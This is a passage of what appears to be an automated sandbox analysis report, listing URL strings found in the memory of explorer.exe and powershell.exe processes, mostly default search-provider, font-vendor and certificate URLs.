Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000016.00000002.449986423.0000020E90451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.433254432.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
